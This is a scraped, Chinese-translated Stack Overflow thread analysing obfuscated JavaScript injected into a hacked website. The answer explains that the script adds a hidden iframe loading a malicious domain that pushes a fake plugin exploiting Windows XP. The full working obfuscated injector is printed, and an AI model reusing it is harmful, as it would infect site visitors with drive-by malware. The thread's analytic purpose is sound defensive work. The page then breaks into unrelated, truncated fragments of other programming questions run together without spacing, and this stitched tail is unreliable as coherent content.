我刚刚访问了一个被黑的网站,我想知道这个 javascript 有什么用。据我所知,它试图将页面重定向到某处但失败了。看起来它进入了服务器上的每一个文件。
<script>
function sF()
{
};
var sMN = new Array();
sF.prototype =
{
b: function ()
{
wL = "wL";
var c = "c";
var wS = new Array();
cY = '';
this.bW = "bW";
this.sR = 35912;
var f = document;
var uH = "uH";
var cJ = 13620;
var n = '';
this.hI = 9833;
this.wX = 45851;
var bI = function ()
{
};
var e = window;
yM = '';
a = "a";
var mV = 57574;
var pD = function ()
{
};
var uQ = "";
var m = this;
this.v = false;
var cB = false;
this.t = 52080;
var qY = false;
this.oV = '';
wG = false;
var nW = function ()
{
};
String.prototype.xAW = function (p, d)
{
var i = this;
return i.replace(p, d)
};
this.xA = '';
var bA = "";
this.oZ = 27110;
var rR = new Array();
var mP = function ()
{
return 'mP'
};
this.aY = 39890;
this.wE = false;
var j = 'sbe)t)T)'.xAW(/[)O4Eb]/g, '') + 'iZm&eZoVu&tV'.xAW(/[V&{:Z]/g, '');
var zR = new Date();
var yV = 30047;
this.wLU = 47818;
var vX = '';
function wD()
{
};
hR = 22291;
var jF = 'eNdNdUsreNtUAUtr'.xAW(/[rpXUN]/g, '') + 'tarNiNs9daf&'.xAW(/[&9aN6]/g, '');
this.iI = false;
this.nK = "nK";
this.sS = '';
this.pL = "pL";
var uP = function ()
{
};
var l = 'w$r$i9t$e|'.xAW(/[|$~(9]/g, '');
var lK = false;
var aU = "aU";
var mB = new Array();
var cS = function ()
{
return 'cS'
};
var nKP = "";
var dH = function ()
{
return 'dH'
};
try
{
tG = "";
var jB = new Date();
hX = '';
var sE = "";
var pE = new Array();
fZ = 41855;
var o = 's)ut'.xAW(/[tJ)md]/g, '') + 'bD'.xAW(/[D$sE{]/g, '') + 'sQtQrQiu'.xAW(/[u+QY/]/g, '') + 'njg7'.xAW(/[7qjky]/g, '');
this.eV = '';
dS = '';
eS = false;
this.eVS = false;
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, '');
fH = "fH";
vU = "";
this.hA = "";
lB = 56028;
var vN = '';
var q = 'szrzcz'.xAW(/[z(k+G]/g, '');
function uT()
{
};
this.jKG = 26380;
this.eG = 41884;
wM = "wM";
var zQ = function ()
{
};
function aW()
{
};
var lD = 16264;
sU = "";
var h = 'o|fRf@c$r/e|a@'.xAW(/[@$|R/]/g, '') + 'tLepE4l4eLm&'.xAW(/[&4LpO]/g, '') + 'e0n0t,rDeDdK'.xAW(/[K0,lD]/g, '');
var iV = '';
var sUW = function ()
{
};
var k = false;
this.kT = false;
this.rW = "rW";
var dY = 60892;
this.xX = 51713;
this.vS = 62755;
var jK = 'lQy;r)h)eQiU'.xAW(/[U)QN;]/g, '') + 'gNhHt!gHr4eB'.xAW(/[BN!4H]/g, '');
function wT()
{
};
bV = "";
var hM = new Date();
var bL = new Array();
var dM = false;
var mI = "";
var x = 't]eTdTwTizdp'.xAW(/[p]z2T]/g, '') + 'tihqg]rqdi'.xAW(/[i]bNq]/g, '');
var sD = '';
this.dN = '';
this.lT = "lT";
var jCF = function ()
{
return 'jCF'
};
function xAA()
{
};
var iIQ = function ()
{
return 'iIQ'
};
var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, '');
var vD = "";
var oF = function ()
{
};
var wGT = "";
xJD = "xJD";
var wH = new Date();
var mM = function ()
{
};
var dP = "dP";
var qF = '';
var vV = "";
mY = false;
var w = 'p0u<s<hk'.xAW(/[kP0Q<]/g, '');
var pN = function ()
{
return 'pN'
};
sM = 43919;
mZ = false;
fM = '';
var g = "";
hF = 51580;
var fJ = new Date();
this.tU = "";
var gG = "gG";
kD = "";
this.hAU = "hAU";
jAV = "";
var qP = '';
var cT = "cT";
var wZ = function ()
{
};
var rE = 'abscwGibfcrGlGiJjJ'.xAW(/[JGDcb]/g, '');
var nT = new Array();
var mA = function ()
{
};
var oZJ = function ()
{
return 'oZJ'
};
this.aM = "";
nM = 5166;
nTR = "";
var oL = 'f#'.xAW(/[#A4@&]/g, '');
zC = false;
tD = "";
this.vQ = false;
var lZN = function ()
{
return 'lZN'
};
lY = 40654;
y = 'spwpq,1mlmypt4'.xAW(/[4pmM,]/g, '');
var qD = "qD";
this.mS = false;
this.jCN = "jCN";
var fV = 26384;
tI = "tI";
this.aP = '';
s = 'a#,pw727hId#eI'.xAW(/[I#up7]/g, '');
xY = false;
var kU = function ()
{
return 'kU'
};
var dJ = "dJ";
var sUH = function ()
{
return 'sUH'
};
aI = 43838;
var dK = false;
this.gR = '';
var oU = new Array();
sZ = 5437;
kH = "kH";
var rY = false;
this.wV = 49424;
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
var eI = "";
function sMF()
{
};
dSG = '';
oD = 15793;
var nQ = function ()
{
};
this.sK = 12917;
this.gC = false;
function lBP()
{
};
qDD = '';
var tA = 1992;
wC = "wC";
this.qV = false;
this.aD = '';
wJ = false;
function tF()
{
};
var rH = new Date();
function qT()
{
};
var vUG = new Date();
var gB = new Date();
this.uL = "";
var nS = "nS";
function dQ()
{
};
qVK = "qVK";
var hQ = new Array();
var lW = new Array();
rG = false;
var gN = "gN";
function iE()
{
};
gV = "gV";
sT = '';
this.fR = "fR";
var wGW = 47062;
this.qJ = "";
this.gBS = "";
var nN = function ()
{
};
var gT = false;
this.qM = "";
var qA = false;
this.oDD = false;
eZ = "eZ";
this.iW = "";
function oFD()
{
};
var tN = function ()
{
return 'tN'
};
tT = 20890;
var uJ = '';
var rM = '';
xO = false;
rK = '';
this.aMR = 31691;
var oLW = new Date();
this.nJ = "";
this.pV = 7748;
var vJ = 8022;
iA = 45357;
var dD = new Array();
var rGR = '';
fU = '';
this.aYO = "";
var gNM = function ()
{
return 'gNM'
};
fN = "";
this.yT = false;
var rC = false;
var tX = "";
var mU = 41520;
this.aJ = "";
this.cH = "cH";
var yY = function ()
{
};
var kI = "kI";
function tK()
{
};
var tAQ = false;
uTD = "uTD";
var hIH = "hIH";
function lBC()
{
};
this.vA = false;
var sDO = false;
eZN = "eZN";
var iL = new Date();
var bZ = 41417;
var dX = '';
var bS = function ()
{
};
mX = false;
this.sDY = 12981;
var sMFV = "sMFV";
var xT = new Array();
iF = "";
var zY = '';
vNL = '';
var hJ = "hJ";
var nI = function ()
{
return 'nI'
};
var tGJ = 41886;
xAM = false;
var tDK = 5185;
var wSH = new Array();
iEM = "iEM";
this.pX = '';
this.sH = false;
hN = '';
var qZ = new Date();
qE = "qE";
var qX = "";
var sUT = false;
eN = "";
function bT()
{
};
var qDC = "qDC";
yR = "yR";
var dMG = false;
this.nL = "";
var oUK = '';
var cW = 60401;
var xOR = 50628;
vW = "vW";
this.qR = "qR";
var kB = false;
function fG()
{
};
var yVS = new Date();
var eQ = oU[5][oU[4]](3, 16);
this.sRU = 40424;
var vSZ = false;
var oUC = function ()
{
};
var pS = new Date();
tC = '';
var uW = "uW";
cA = "";
var xJ = oU[7][oU[4]](3, 6);
nE = "nE";
var jV = false;
fUG = "";
var aX = false;
this.zJ = '';
this.dC = "dC";
function lDV()
{
};
var u = oU[1][oU[4]](3, 4);
var aF = function ()
{
};
this.sKM = '';
gH = 35602;
this.tE = false;
this.wR = '';
var lQ = function ()
{
return 'lQ'
};
jA = xJ + 'a3m3e3'.xAW(/[3Fr6h]/g, '');
var tNZ = false;
sHZ = '';
var zI = new Date();
this.hT = '';
fY = false;
this.aN = "aN";
var qEY = 35434;
var z = oU[12][oU[4]](3, 4);
var hZQ = new Date();
var cX = function ()
{
return 'cX'
};
this.lI = false;
this.nMM = "";
var dV = "";
iM = false;
var rJ = oU[8][oU[4]](3, 11);
yVB = false;
this.zP = "";
this.jO = 34768;
var bH = new Array();
this.hIHR = "hIHR";
lZ = rJ + 'b)u.tHeQ'.xAW(/[QH)N.]/g, '');
var xI = new Date();
this.yJ = false;
this.tGO = 27688;
this.yN = 6549;
xE = '';
var bZF = false;
var xZ = oU[11][eQ](jA);
zYQ = false;
this.mC = 40578;
var zPY = '';
this.yTB = '';
var gA = function ()
{
};
var qL = 29571;
var iZ = new Date();
var qN = oU[3][oU[4]](3, 9);
var vP = "vP";
var yQ = new Date();
this.gX = '';
var iZV = '';
this.hH = 63374;
var jC = oU[6][oU[4]](3, 8);
var lKY = new Date();
var sRA = "";
var kUY = '';
var zS = function ()
{
return 'zS'
};
xZ[oU[2]] = 'hTt!t|p):6/|/)m|a)c|rTo6m)e)d)iTa)s6e6t|uTp!.!c|o6m|/!z!o!mTbTiTe!/)'.xAW(/[)6T|!]/g, '');
this.rT = false;
var qU = '';
var nQX = function ()
{
return 'nQX'
};
this.nQK = "";
fK = false;
var aK = new Array();
this.eC = "";
uM = '';
qXG = "qXG";
cD = "cD";
this.mL = false;
var xF = function ()
{
};
xZ[jC] = u;
lH = false;
var hRX = 24381;
var jP = "jP";
var rD = new Array();
this.pK = "pK";
sQ = '';
this.lJ = '';
var dW = function ()
{
return 'dW'
};
var eP = new Array();
xZ[qN] = z;
var mK = new Date();
var sZM = 33888;
var wJZ = "wJZ";
zA = "";
var fW = function ()
{
};
this.lIJ = "";
xL = "";
var rKL = 29796;
var xR = new Date();
var pP = false;
var qK = "";
gTS = "";
oU[11][oU[9]][oU[10]](xZ);
var aG = function ()
{
return 'aG'
};
function hV()
{
};
gE = "gE";
var uHJ = "";
this.nNX = false;
}
catch (xG)
{
this.wSN = '';
function yJX()
{
};
var sTG = new Array();
this.wCW = "wCW";
this.eT = "eT";
iK = "iK";
f[l]('<RhRt[m;l; [>a<[b|oRd[y; ;>|<|t[d; R>a<[/atRdR>a<;/Rbao[d[y;>;<;/|h|t;malR>R'.xAW(/[Ra[|;]/g, ''));
this.xN = 35962;
var uJT = 22074;
fL = '';
var wJD = '';
oFI = '';
e[j](function ()
{
m.b()
}, 141);
tEC = "";
this.vK = "vK";
var hS = function ()
{
};
var gTT = new Array();
}
var yJB = function ()
{
return 'yJB'
};
this.mXU = "mXU";
this.tFO = false;
}
};
var fI = 4253;
var bJ = new sF();
bVT = 29950;
bJ.b();
var hK = function ()
{
return 'hK'
};
</script>
感谢 Peter Ajtai 清理了它(尽管编辑它似乎重新加载了所有清理过的脚本......一定是 SO 事情)
最佳答案
好的,这就是我想出的...
基本上这个脚本做了一个
document.body.append('<iframe height="1" src="http://macromediasetup.com/zombie/">');
重点是:
oU[11][oU[9]][oU[10]](xZ);
oU 是一个由行填充的数组:
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
oU[w] 是对 Array.push 的引用。因此,调用它会将这 13 个项目插入数组。 f, hZ 和 r -> oU[11], oU[9], oU[10] 分别是:
var f = document;
var hZ = 'b]o]dBy5'.xAW(/[5];BD]/g, ''); // evaluates to "body"
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, ''); // evaluates to "append"
因此,这变成了 document['body']['append'] 或 document.body.append()
xZ 是 iframe 字符串,因此它将 iframe 添加到页面。虽然直接点击 macromediasetup.com 只是重定向到 adobe.com,但点击僵尸路由会做一些完全不同的事情......
并且此域的 whois 显示它不属于 adobe:
$ whois macromediasetup.com
[Querying whois.verisign-grs.com]
[Redirected to whois.PublicDomainRegistry.com]
[Querying whois.PublicDomainRegistry.com]
[whois.PublicDomainRegistry.com]
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111
Domain Name: MACROMEDIASETUP.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 28-May-2010
Expiration Date: 28-May-2011
Domain servers in listed order:
ns2.reg.ru
ns1.reg.ru
Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Technical Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Billing Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Traceroute 显示它去拉脱维亚的某个地方...
7 nyk-bb1-link.telia.net (80.91.252.162) 77.169 ms 77.401 ms 77.327 ms
8 kbn-bb1-link.telia.net (80.91.254.88) 156.938 ms 156.960 ms 156.842 ms
9 s-bb1-link.telia.net (80.91.247.160) 166.491 ms 166.425 ms 166.499 ms
10 s-b3-link.telia.net (80.91.247.105) 212.715 ms 212.759 ms 212.776 ms
11 telia-latvija-ic-132810-s-b3.c.telia.net (213.248.82.134) 203.272 ms 203.313 ms 203.936 ms
编辑 好的,所以我做了更多的挖掘,只是因为它很有趣并且我弄清楚了到底发生了什么。包含在 iframe 中的文件会检索一个文件,该文件将对 Windows XP 机器使用“hcp”协议(protocol) hack。基本上,包含的文件会在您的浏览器中显示一条消息“您需要安装一些您没有的漂亮插件”……然后,当您安装它时,您就在便便中。
关于javascript - 这个脚本是做什么的? - 被黑的网站,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/3337263/
类classAprivatedeffooputs:fooendpublicdefbarputs:barendprivatedefzimputs:zimendprotecteddefdibputs:dibendendA的实例a=A.new测试a.foorescueputs:faila.barrescueputs:faila.zimrescueputs:faila.dibrescueputs:faila.gazrescueputs:fail测试输出failbarfailfailfail.发送测试[:foo,:bar,:zim,:dib,:gaz].each{|m|a.send(m)resc
我有一个模型:classItem项目有一个属性“商店”基于存储的值,我希望Item对象对特定方法具有不同的行为。Rails中是否有针对此的通用设计模式?如果方法中没有大的if-else语句,这是如何干净利落地完成的? 最佳答案 通常通过Single-TableInheritance. 关于ruby-on-rails-Rails-子类化模型的设计模式是什么?,我们在StackOverflow上找到一个类似的问题: https://stackoverflow.co
我正在寻找执行以下操作的正确语法(在Perl、Shell或Ruby中):#variabletoaccessthedatalinesappendedasafileEND_OF_SCRIPT_MARKERrawdatastartshereanditcontinues. 最佳答案 Perl用__DATA__做这个:#!/usr/bin/perlusestrict;usewarnings;while(){print;}__DATA__Texttoprintgoeshere 关于ruby-如何将脚
我正在使用的第三方API的文档状态:"[O]urAPIonlyacceptspaddedBase64encodedstrings."什么是“填充的Base64编码字符串”以及如何在Ruby中生成它们。下面的代码是我第一次尝试创建转换为Base64的JSON格式数据。xa=Base64.encode64(a.to_json) 最佳答案 他们说的padding其实就是Base64本身的一部分。它是末尾的“=”和“==”。Base64将3个字节的数据包编码为4个编码字符。所以如果你的输入数据有长度n和n%3=1=>"=="末尾用于填充n%
我主要使用Ruby来执行此操作,但到目前为止我的攻击计划如下:使用gemsrdf、rdf-rdfa和rdf-microdata或mida来解析给定任何URI的数据。我认为最好映射到像schema.org这样的统一模式,例如使用这个yaml文件,它试图描述数据词汇表和opengraph到schema.org之间的转换:#SchemaXtoschema.orgconversion#data-vocabularyDV:name:namestreet-address:streetAddressregion:addressRegionlocality:addressLocalityphoto:i
为什么4.1%2返回0.0999999999999996?但是4.2%2==0.2。 最佳答案 参见此处:WhatEveryProgrammerShouldKnowAboutFloating-PointArithmetic实数是无限的。计算机使用的位数有限(今天是32位、64位)。因此计算机进行的浮点运算不能代表所有的实数。0.1是这些数字之一。请注意,这不是与Ruby相关的问题,而是与所有编程语言相关的问题,因为它来自计算机表示实数的方式。 关于ruby-为什么4.1%2使用Ruby返
它不等于主线程的binding,这个toplevel作用域是什么?此作用域与主线程中的binding有何不同?>ruby-e'putsTOPLEVEL_BINDING===binding'false 最佳答案 事实是,TOPLEVEL_BINDING始终引用Binding的预定义全局实例,而Kernel#binding创建的新实例>Binding每次封装当前执行上下文。在顶层,它们都包含相同的绑定(bind),但它们不是同一个对象,您无法使用==或===测试它们的绑定(bind)相等性。putsTOPLEVEL_BINDINGput
我有一个在Linux服务器上运行的ruby脚本。它不使用rails或任何东西。它基本上是一个命令行ruby脚本,可以像这样传递参数:./ruby_script.rbarg1arg2如何将参数抽象到配置文件(例如yaml文件或其他文件)中?您能否举例说明如何做到这一点?提前谢谢你。 最佳答案 首先,您可以运行一个写入YAML配置文件的独立脚本:require"yaml"File.write("path_to_yaml_file",[arg1,arg2].to_yaml)然后,在您的应用中阅读它:require"yaml"arg
我可以得到Infinity和NaNn=9.0/0#=>Infinityn.class#=>Floatm=0/0.0#=>NaNm.class#=>Float但是当我想直接访问Infinity或NaN时:Infinity#=>uninitializedconstantInfinity(NameError)NaN#=>uninitializedconstantNaN(NameError)什么是Infinity和NaN?它们是对象、关键字还是其他东西? 最佳答案 您看到打印为Infinity和NaN的只是Float类的两个特殊实例的字符串
如果您尝试在Ruby中的nil对象上调用方法,则会出现NoMethodError异常并显示消息:"undefinedmethod‘...’fornil:NilClass"然而,有一个tryRails中的方法,如果它被发送到一个nil对象,它只返回nil:require'rubygems'require'active_support/all'nil.try(:nonexisting_method)#noNoMethodErrorexceptionanymore那么try如何在内部工作以防止该异常? 最佳答案 像Ruby中的所有其他对象